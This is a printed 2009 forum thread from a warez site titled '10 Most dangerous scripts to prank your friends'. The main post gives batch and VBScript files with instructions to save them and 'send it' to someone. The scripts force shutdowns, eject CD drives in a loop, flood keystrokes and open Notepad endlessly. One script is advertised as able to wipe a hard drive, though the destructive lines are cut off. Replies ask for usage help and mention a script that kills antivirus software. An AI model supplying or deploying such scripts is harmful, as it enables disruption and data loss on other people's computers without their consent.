You are on page 1of 9

10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

Home User Cp Members Search Faq PhazeDDL Katz

CyberWarez > ::| CW Tech Corner |:: > Tutorials, Manuals, & Tricks Welcome, vijay john.
You last visited: Today at 10:50 AM
10 Most dangerous scripts to prank your friends.. Your Notifications: 1

User CP FAQ Community Calendar New Posts Search Quick Links Log Out

Notices

vijay john, Click here to donate today to get exclusive VIP status!
.:: Join the CW Uploaders Team ::.

Tutorials, Manuals, & Tricks Share any kind of helpful tech tutorial/manual/trick or discussion here...

Thread Tools Search this Thread Rate Thread Display Modes

10 Most dangerous scripts to prank your friends..


05-29-2009, 11:55 AM #1

10 Most dangerous scripts to prank your friends..


TeRm!NaToR
CW Guru
ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---

1) Convey your friend a little message and shut down his / her computer:
Type :

Code:
@echo off
Join Date: Jul 2008 msg * I don't like you
Location: Inside The Mind Of
shutdown -c "Error! You are too stupid!" -s
Computer Hackers....
Posts: 704

Save it as "Anything.BAT" in All Files and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all
of them!
Type :

Quote:

Set oWMP = CreateObject("WMPlayer.OCX.7")


Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

1 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:


Type :

Quote:

Set wshShell = wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend
out:
Type :

Quote:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:


Type :

Quote:

MsgBox "Let's go back a few steps"


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

2 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

Type :

Quote:

Set wshShell = wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:


Type :

Quote:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between
1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

Quote:

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to
kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when
you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Dont Try It On Your Machine......Or Else...


__________________

...

TeRm!NaTor - Deep Saha:smoke:

3 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

HaCK aND RuLE ThE wOrLD !!

Please Reply My Post....


Please Don't ASK Me How To HacK..

05-31-2009, 05:34 PM #2

NaRToTiK
CW Member
thanks.... but there is nothing new in here

Join Date: Jan 2009


Posts: 35

05-31-2009, 09:17 PM #3

TeRm!NaToR
CW Guru
Knew But Posted For Newbes......
__________________

...

TeRm!NaTor - Deep Saha:smoke:

Join Date: Jul 2008


Location: Inside The Mind Of
Computer Hackers....
Posts: 704

HaCK aND RuLE ThE wOrLD !!

Please Reply My Post....


Please Don't ASK Me How To HacK..

06-13-2009, 07:35 AM #4

4 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

imlegend56
CW Member
Quote:

Originally Posted by TeRm!NaToR


Knew But Posted For Newbes......
Join Date: May 2009
Location: Sialkot - Pakistan .
Age: 16
Posts: 35
every1 is newbie at first time u too men... dont hurt newbies guyz they also need to learn
!!!

06-13-2009, 08:54 AM #5

kei82
CW Member
Quote:

Originally Posted by imlegend56


every1 is newbie at first time u too men... dont hurt newbies guyz they also need to
learn !!!

I agree with your opinion man!!!


respect!!
Join Date: Mar 2009
Posts: 86

06-13-2009, 11:20 AM #6

johns
CW Regular
hw many times u gonna post dis terminator
__________________

Join Date: Feb 2009


Location: Pune
Age: 23
Posts: 155

06-14-2009, 11:31 AM #7

breaker2
CW Member
tnx for dis
but wer # 2?

breaker2's Avatar

Join Date: May 2009


Location: Philippines XD

5 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

Age: 14
Posts: 55

06-14-2009, 11:37 AM #8

breaker2
CW Member
how to do the # 9
can understand how its works x_X

breaker2's Avatar

Join Date: May 2009


Location: Philippines XD
Age: 14
Posts: 55

06-14-2009, 04:21 PM #9

nitingoyal
CW Novice
For all this trick is there any remedy

does it really harm our computer in a bad way


Join Date: Jun 2009
Posts: 1

08-10-2009, 03:21 PM #10

maxvideos
CW Member
use virtual pc
and install xp on it and try on it...

maxvideos's Avatar

Join Date: Aug 2009


Location: srilanka
Age: 27
Posts: 64

08-11-2009, 03:55 PM #11

everflowriver
CW Member
Thanks man , it does great. like it.

Join Date: Aug 2009


Posts: 83

6 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

08-15-2009, 08:21 AM #12

TsukameAkasuma
CW Member
Quote:

Originally Posted by nitingoyal


For all this trick is there any remedy

TsukameAkasuma's Avatar
does it really harm our computer in a bad way

Join Date: Apr 2009


Location: Minegard, Next to not really that i know of, i meen its all fun and games until someone's HDD crash's, just have fun
the Rathalos with these, thx TeRm!NaToR
Posts: 82 __________________

Thx LadyPhoenix

CyberWarez FTW!

08-15-2009, 10:27 AM #13

Echo1234
CW Regular
What do you mean by "send it" ?

Join Date: Jul 2008


Posts: 128

08-15-2009, 11:39 AM #14

sumit8510
CW Regular
thanks man

sumit8510's Avatar

Join Date: Jun 2009


Location: india
Posts: 318

08-15-2009, 11:50 AM #15

darklucifer
CW Member
thankss
__________________
__________________

7 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

__________________
Join Date: Jul 2008
Posts: 53

08-17-2009, 03:43 PM #16

Cali777
CW Member
Quote:

Originally Posted by Echo1234


What do you mean by "send it" ?
Join Date: May 2009
Posts: 44

Email,Messenger what we talking or does it matter? These are cool though, Thanks

08-18-2009, 08:10 AM #17

rjlazart
CW Regular
Thanks!!!

rjlazart's Avatar

Join Date: Jul 2009


Location: Earth
Posts: 107

10-31-2009, 01:21 PM #18

nzzno
CW Member
thnx

Join Date: Jan 2009


Posts: 40

10-31-2009, 02:18 PM #19

nautiyal_rocks
CW Regular
i have other lots of stuff like u said above i knew those already i had created another one see ma post
"kill any antivirus with .bat"
__________________
nautiyal_rocks's Avatar

Join Date: Apr 2009


Location: GOD KNOWS
Posts: 102

8 of 9 11/3/2009 11:19 AM
10 Most dangerous scripts to prank your friends.. - CyberWarez http://cyberwarez.info/forum/tutorials-manuals-tricks/363899-10-most-da...

Quick Reply

Message:

Options

Quote message in reply?

« Previous Thread | Next Thread »

Currently Active Users Viewing This Thread: 2 (2 members and 0 guests)

vijay john, ryuji_hiryu21

Posting Rules

You may post new threads


You may post replies
You may not post attachments
You may edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Trackbacks are Off
Pingbacks are Off
Refbacks are Off
Forum Jump
Forum Rules

All times are GMT +5.5. The time now is 11:12 AM.

Contact Us - CyberWarez - Archive - Top

Powered by vBulletin® Version 3.8.4


Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.

9 of 9 11/3/2009 11:19 AM

You might also like